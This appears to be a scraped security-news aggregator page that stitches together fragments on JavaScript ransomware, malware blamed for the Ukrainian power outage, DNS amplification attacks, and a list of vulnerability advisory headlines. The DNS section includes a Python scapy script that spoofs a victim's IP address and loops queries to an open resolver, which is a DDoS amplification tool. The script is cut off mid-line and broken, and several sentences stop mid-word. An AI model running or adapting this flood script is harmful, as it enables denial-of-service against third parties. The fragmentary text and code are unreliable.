Hackin9
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

We have all seen how ransomware is becoming a pretty common trend in cybercrime. Well, there is a new variant, and this one has been built using JavaScript. This malware fakes the NW.js framework. Once installed, connects to its C

 

(credit: Krzysztof Lasoń)

Highly destructive malware that infected at least three regional power authorities in Ukraine led to a power failure that left hundreds of thousands of homes without electricity last week, researchers said.

The outage left about half of the homes in the Ivano-Frankivsk region of Ukraine without electricity, Ukrainian news service TSN reported in an article posted a day after the December 23 failure. The report went on to say that the outage was the result of malware that disconnected electrical substations. On Monday, researchers from security firm iSIGHT Partners said they had obtained samples of the malicious code that infected at least three regional operators. They said the malware led to "destructive events" that in turn caused the blackout. If confirmed it would be the first known instance of someone using malware to generate a power outage.

"It's a milestone because we've definitely seen targeted destructive events against energy before—oil firms, for instance—but never the event which causes the blackout," John Hultquist, head of iSIGHT's cyber espionage intelligence practice, told Ars. "It's the major scenario we've all been concerned about for so long."


 

Yes, it has been said too many times, but there are still too many DNS servers out there allowing recursion to devices outside their network, which could be used for DNS amplification attacks. How? The attacker sends a spoofed DNS request with the victim's IP address as its source, usually from a botnet. When the misconfigured DNS server answers, it sends the response to the victim's IP address, causing a DDoS attack.

How can you test if your DNS server allows recursion from the outside? You can use the dns-recursion nmap script:

If it
#!/usr/bin/python
from scapy.all import *
victimIP = raw_input("Please enter the IP address for the victim: ")
dnsIP = raw_input("Please enter the IP address for the misconfigured DNS: ")
while True:
    send(IP(dst=dnsIP,src=victimIP)/UDP(dport=53)/DNS(rd=1,qd=DNSQR(qname=www.google.com
options {

Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
Twitter: @manuelsantander
Web: http://manuel.santander.name
e-mail: msantand at isc dot sans dot org

 
CVE-2015-7944, CVE-2015-7945 - Ganeti Security Advisory (DoS, Unauthenticated Info Leak)
 
Confluence Vulnerabilities
 

Naked Security

Monday review – the hot 10 stories of the week

 
Executable installers/self-extractors are vulnerable^WEVIL (case 17): Kaspersky Labs utilities
 
[SECURITY] CVE-2015-5349: Apache Directory Studio command injection vulnerability
 
Open Audit SQL Injection Vulnerability
 
[SECURITY] [DSA 3433-1] samba security update
 